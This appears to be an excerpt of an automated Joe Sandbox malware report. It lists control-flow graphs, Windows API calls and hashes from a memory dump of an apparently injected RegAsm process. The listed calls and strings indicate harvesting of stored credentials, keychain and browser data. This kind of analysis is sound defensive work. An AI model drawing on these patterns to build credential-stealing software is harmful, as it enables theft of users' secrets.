memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                APIs
                                                                • memset.MSVCRT ref: 004455C2
                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 0044570D
                                                                • memset.MSVCRT ref: 00445725
                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                • memset.MSVCRT ref: 0044573D
                                                                • memset.MSVCRT ref: 00445755
                                                                • memset.MSVCRT ref: 004458CB
                                                                • memset.MSVCRT ref: 004458E3
                                                                • memset.MSVCRT ref: 0044596E
                                                                • memset.MSVCRT ref: 00445A10
                                                                • memset.MSVCRT ref: 00445A28
                                                                • memset.MSVCRT ref: 00445AC6
                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                • memset.MSVCRT ref: 00445B52
                                                                • memset.MSVCRT ref: 00445B6A
                                                                • memset.MSVCRT ref: 00445C9B
                                                                • memset.MSVCRT ref: 00445CB3
                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                • memset.MSVCRT ref: 00445B82
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                • memset.MSVCRT ref: 00445986
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                • API String ID: 2263259095-3798722523
                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                • String ID: $/deleteregkey$/savelangfile
                                                                • API String ID: 2744995895-28296030
                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                • memset.MSVCRT ref: 0040B756
                                                                • memset.MSVCRT ref: 0040B7F5
                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                • memset.MSVCRT ref: 0040B851
                                                                • memset.MSVCRT ref: 0040B8CA
                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • memset.MSVCRT ref: 0040BB53
                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                • String ID: chp$v10
                                                                • API String ID: 4290143792-2783969131
                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                APIs
                                                                • memset.MSVCRT ref: 004091E2
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                • String ID:
                                                                • API String ID: 3715365532-3916222277
                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 599 413ee4 591->599 600 413ee7-413efe 591->600 605 413ea2-413eae CloseHandle 593->605 597 413e61-413e68 594->597 598 413e37-413e44 GetModuleHandleW 594->598 597->593 601 413e6a-413e76 597->601 598->597 603 413e46-413e5c GetProcAddress 598->603 599->600 600->581 601->593 603->597 605->584
                                                                APIs
                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                • memset.MSVCRT ref: 00413D7F
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                • memset.MSVCRT ref: 00413E07
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                • free.MSVCRT ref: 00413EC1
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                • API String ID: 1344430650-1740548384
                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                • String ID: bhv
                                                                • API String ID: 4234240956-2689659898
                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                • API String ID: 2941347001-70141382
                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                • String ID:
                                                                • API String ID: 2827331108-0
                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • wcschr.MSVCRT ref: 0040C324
                                                                • wcschr.MSVCRT ref: 0040C344
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                • String ID: visited:
                                                                • API String ID: 1157525455-1702587658
                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • free.MSVCRT ref: 0040E28B
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                • API String ID: 2804212203-2982631422
                                                                • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                • memset.MSVCRT ref: 0040BC75
                                                                • memset.MSVCRT ref: 0040BC8C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                • String ID:
                                                                • API String ID: 115830560-3916222277
                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
